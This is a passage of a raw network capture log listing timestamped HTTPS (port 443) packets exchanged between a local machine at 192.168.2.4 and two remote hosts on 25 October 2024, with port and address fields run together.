                                              Oct 25, 2024 15:45:58.141644001 CEST4434979913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.142241001 CEST49799443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.142251968 CEST4434979913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.142710924 CEST49799443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.142715931 CEST4434979913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.149133921 CEST49796443192.168.2.420.12.23.50
                                              Oct 25, 2024 15:45:58.195333958 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.266809940 CEST4434980013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.267988920 CEST49800443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.267988920 CEST49800443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.268033981 CEST4434980013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.268060923 CEST4434980013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.275206089 CEST4434979913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.275266886 CEST4434979913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.275510073 CEST49799443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.275510073 CEST49799443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.275547028 CEST49799443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.275563955 CEST4434979913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.278394938 CEST49804443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.278439999 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.278625965 CEST49804443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.278687954 CEST49804443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.278696060 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.401362896 CEST4434980013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.401420116 CEST4434980013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.401736021 CEST49800443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.401781082 CEST49800443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.401781082 CEST49800443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.401801109 CEST4434980013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.401810884 CEST4434980013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.404684067 CEST49805443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.404725075 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.404849052 CEST49805443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.404972076 CEST49805443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.404989004 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.432343006 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.432367086 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.432410002 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.432461023 CEST49796443192.168.2.420.12.23.50
                                              Oct 25, 2024 15:45:58.432509899 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.432564020 CEST49796443192.168.2.420.12.23.50
                                              Oct 25, 2024 15:45:58.432631016 CEST49796443192.168.2.420.12.23.50
                                              Oct 25, 2024 15:45:58.434367895 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.434432030 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.434443951 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.434475899 CEST49796443192.168.2.420.12.23.50
                                              Oct 25, 2024 15:45:58.434514999 CEST49796443192.168.2.420.12.23.50
                                              Oct 25, 2024 15:45:58.436904907 CEST49796443192.168.2.420.12.23.50
                                              Oct 25, 2024 15:45:58.436906099 CEST49796443192.168.2.420.12.23.50
                                              Oct 25, 2024 15:45:58.436944008 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.436969042 CEST4434979620.12.23.50192.168.2.4
                                              Oct 25, 2024 15:45:58.877692938 CEST4434980213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.878313065 CEST4434980313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.878356934 CEST49802443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.878424883 CEST4434980213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.878736019 CEST49803443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.878753901 CEST4434980313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.878807068 CEST49802443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.878840923 CEST4434980213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:58.879149914 CEST49803443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:58.879156113 CEST4434980313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.008877039 CEST4434980313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.009665966 CEST4434980313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.009763002 CEST49803443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.009763002 CEST49803443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.009850979 CEST49803443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.009865999 CEST4434980313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.012619019 CEST49806443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.012666941 CEST4434980613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.012862921 CEST49806443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.012940884 CEST49806443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.012947083 CEST4434980613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.013895988 CEST4434980213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.013899088 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.013988018 CEST4434980213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.014688015 CEST49804443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.014688015 CEST49804443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.014698029 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.014714003 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.014735937 CEST49802443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.014803886 CEST49802443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.014803886 CEST49802443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.014842033 CEST4434980213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.014869928 CEST4434980213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.016838074 CEST49807443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.016885042 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.016978979 CEST49807443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.017074108 CEST49807443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.017086029 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.085239887 CEST4434980113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.086317062 CEST49801443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.086318016 CEST49801443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.086329937 CEST4434980113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.086347103 CEST4434980113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.137558937 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.138019085 CEST49805443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.138031960 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.138448000 CEST49805443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.138453960 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.145771027 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.146090984 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.146401882 CEST49804443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.146437883 CEST49804443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.146437883 CEST49804443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.146461964 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.146471024 CEST4434980413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.151814938 CEST49808443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.151844978 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.155930996 CEST49808443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.155930996 CEST49808443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.155973911 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.215859890 CEST4434980113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.215945005 CEST4434980113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.216253996 CEST49801443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.216253996 CEST49801443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.216283083 CEST49801443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.216305017 CEST4434980113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.219399929 CEST49809443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.219460964 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.219696999 CEST49809443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.219728947 CEST49809443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.219738007 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.267874956 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.267970085 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.268038034 CEST49805443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.268122911 CEST49805443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.268145084 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.268157959 CEST49805443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.268165112 CEST4434980513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.270742893 CEST49810443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.270787954 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.270966053 CEST49810443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.271023035 CEST49810443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.271029949 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.755065918 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.755530119 CEST49807443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.755562067 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.755951881 CEST49807443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.755965948 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.760698080 CEST4434980613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.760989904 CEST49806443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.761007071 CEST4434980613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.761436939 CEST49806443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.761441946 CEST4434980613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.884855986 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.885060072 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.885114908 CEST49807443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.885155916 CEST49807443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.885175943 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.885189056 CEST49807443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.885195971 CEST4434980713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.887722969 CEST49811443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.887794018 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.887881994 CEST49811443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.888011932 CEST49811443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.888030052 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.891619921 CEST4434980613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.892180920 CEST4434980613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.892242908 CEST49806443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.892268896 CEST49806443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.892287970 CEST4434980613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.894067049 CEST49812443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.894094944 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.894177914 CEST49812443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.894308090 CEST49812443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.894321918 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.899507999 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.899825096 CEST49808443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.899841070 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.900239944 CEST49808443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.900247097 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.957957029 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.958266020 CEST49809443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.958292007 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:45:59.958591938 CEST49809443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:45:59.958605051 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.000164986 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.000544071 CEST49810443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.000556946 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.000889063 CEST49810443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.000895023 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.039237976 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.039408922 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.039463997 CEST49808443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.039652109 CEST49808443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.039670944 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.039683104 CEST49808443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.039690971 CEST4434980813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.041593075 CEST49813443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.041624069 CEST4434981313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.041766882 CEST49813443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.042028904 CEST49813443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.042042017 CEST4434981313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.087217093 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.087944031 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.088079929 CEST49809443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.088135958 CEST49809443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.088135958 CEST49809443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.088165045 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.088193893 CEST4434980913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.090235949 CEST49814443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.090287924 CEST4434981413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.090409994 CEST49814443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.090548992 CEST49814443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.090568066 CEST4434981413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.131727934 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.132000923 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.132055044 CEST49810443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.132091999 CEST49810443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.132110119 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.132126093 CEST49810443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.132133007 CEST4434981013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.133892059 CEST49815443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.133903980 CEST4434981513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.133965969 CEST49815443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.134089947 CEST49815443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.134104013 CEST4434981513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.623292923 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.623740911 CEST49811443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.623775005 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.624205112 CEST49811443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.624218941 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.649440050 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.649894953 CEST49812443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.649923086 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.650223017 CEST49812443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.650229931 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.750962973 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.751044035 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.754153967 CEST49811443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.754668951 CEST49811443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.754668951 CEST49811443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.754702091 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.754733086 CEST4434981113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.761620045 CEST49816443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.761662006 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.762080908 CEST49816443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.762161970 CEST49816443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.762168884 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.762422085 CEST4434981313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.762840033 CEST49813443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.762868881 CEST4434981313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.763279915 CEST49813443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.763287067 CEST4434981313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.782886028 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.783046961 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.783266068 CEST49812443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.783339024 CEST49812443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.783339024 CEST49812443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.783359051 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.783370972 CEST4434981213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.785444975 CEST49817443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.785520077 CEST4434981713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.785765886 CEST49817443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.786004066 CEST49817443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.786040068 CEST4434981713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.829349041 CEST4434981413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.829884052 CEST49814443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.829895020 CEST4434981413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.830205917 CEST49814443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.830210924 CEST4434981413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.877211094 CEST4434981513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.877537966 CEST49815443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.877553940 CEST4434981513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.877892017 CEST49815443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.877897978 CEST4434981513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.890470982 CEST4434981313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.890645027 CEST4434981313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.890726089 CEST49813443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.890727043 CEST49813443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.890794039 CEST49813443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.890810966 CEST4434981313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.892740965 CEST49818443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.892762899 CEST4434981813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.892968893 CEST49818443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.893105984 CEST49818443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.893127918 CEST4434981813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.961819887 CEST4434981413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.961962938 CEST4434981413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.962074041 CEST49814443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.962074041 CEST49814443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.962243080 CEST49814443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.962253094 CEST4434981413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.963927984 CEST49819443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.963974953 CEST4434981913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:00.964193106 CEST49819443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.964194059 CEST49819443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:00.964252949 CEST4434981913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.007985115 CEST4434981513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.008275032 CEST4434981513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.008357048 CEST49815443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.008357048 CEST49815443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.008419037 CEST49815443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.008433104 CEST4434981513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.010449886 CEST49820443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.010487080 CEST4434982013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.010670900 CEST49820443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.010670900 CEST49820443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.010696888 CEST4434982013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.508234978 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.508754015 CEST49816443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.508773088 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.509347916 CEST49816443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.509352922 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.524343967 CEST4434981713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.524744987 CEST49817443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.524769068 CEST4434981713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.525295019 CEST49817443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.525301933 CEST4434981713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.633660078 CEST4434981813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.634171963 CEST49818443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.634186983 CEST4434981813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.634735107 CEST49818443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.634747028 CEST4434981813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.654340029 CEST4434981713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.654722929 CEST4434981713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.655018091 CEST49817443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.655018091 CEST49817443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.655018091 CEST49817443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.657727957 CEST49821443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.657798052 CEST4434982113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.657880068 CEST49821443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.658061981 CEST49821443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.658090115 CEST4434982113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.659626007 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.660876036 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.660938025 CEST49816443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.660969973 CEST49816443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.660984039 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.660994053 CEST49816443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.661000013 CEST4434981613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.663933039 CEST49822443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.663970947 CEST4434982213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.664045095 CEST49822443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.664242983 CEST49822443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.664261103 CEST4434982213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.709603071 CEST4434981913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.710017920 CEST49819443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.710050106 CEST4434981913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.710443020 CEST49819443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.710455894 CEST4434981913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.752785921 CEST4434982013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:01.753142118 CEST49820443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:01.753171921 CEST4434982013.107.246.45192.168.2.4
